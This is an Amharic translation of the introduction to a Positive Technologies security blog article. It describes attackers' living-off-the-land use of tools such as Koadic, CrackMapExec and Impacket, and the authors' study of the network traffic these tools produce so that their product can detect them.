ከመሬት ውጪ ያለው ኑሮ በሳይበር ወንጀለኞች ዘንድ ተወዳጅነት እያገኘ ነው። አብሮ የተሰራውን የዊንዶውስ መሳሪያዎችን እና ስልቶችን ለፍላጎታቸው ይጠቀማሉ። ታዋቂዎቹ መሳሪያዎች Koadic፣ CrackMapExec እና Impacket ይህንን መርህ በመከተል በኤፒቲ ሪፖርቶች ውስጥ በተደጋጋሚ ሲታዩ እናያለን። ለእነዚህ መሳሪያዎች በ GitHub ላይ ያሉ ሹካዎች ቁጥር እያደገ ነው, አዳዲሶች ይታያሉ (አሁን አሁን ወደ አንድ ሺህ ገደማ አሉ). አዝማሚያው በቀላልነቱ ተወዳጅነት እያገኘ ነው-አጥቂዎች የሶስተኛ ወገን መሳሪያዎችን አያስፈልጉም ፣ እነሱ ቀድሞውኑ በተጎጂዎች ማሽኖች ላይ ናቸው እና የደህንነት እርምጃዎችን ለማለፍ ይረዳሉ። በአውታረ መረብ መስተጋብር ጥናት ላይ እናተኩራለን-ከላይ የተገለፀው እያንዳንዱ መሳሪያ በኔትወርክ ትራፊክ ውስጥ ዱካውን ይተዋል; የእነሱ ዝርዝር ጥናት ምርታችንን እንድናስተምር አስችሎናል የ PT አውታረ መረብ ጥቃት ግኝት እነሱን ለማግኘት, ይህም በመጨረሻ እነሱን የሚያካትቱትን ሁሉንም የሳይበር ክስተቶች ሰንሰለት ለመመርመር ይረዳል.

ደራሲያን:

  • አንቶን ታይሪን, የባለሙያ አገልግሎት መምሪያ ኃላፊ, PT ኤክስፐርት ደህንነት ማዕከል, አዎንታዊ ቴክኖሎጂዎች
  • Egor Podmokov, ኤክስፐርት, PT ኤክስፐርት ደህንነት ማዕከል, አዎንታዊ ቴክኖሎጂዎች

ምንጭ: hab.com

አስተያየት ያክሉ